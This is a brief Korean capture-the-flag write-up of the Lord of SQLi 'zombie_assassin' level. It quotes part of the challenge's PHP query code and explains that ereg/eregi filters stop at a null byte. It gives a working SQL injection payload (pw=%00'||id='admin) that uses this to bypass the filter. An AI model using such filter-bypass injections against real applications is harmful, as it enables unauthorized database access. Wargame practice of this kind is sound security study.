los 15번

query : {$query}

"; 
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result['id']) solve("zombie_assassin"); 
  highlight_file(__FILE__); 
?>

id와 pw 모두

\\ prob _ . () 가 들어가면 안된다

ereg->그리고 ' 이 들어가면 안된다!

ereg와 eregi 함수를 우회할 수 있는 방법이 있다.

ereg, eregi는 %00까지만 체크하므로 우회가능!

?id=admin&pw=%00'||id='admin

query : select id from prob_zombie_assassin where id='admin' and pw=''||id='admin'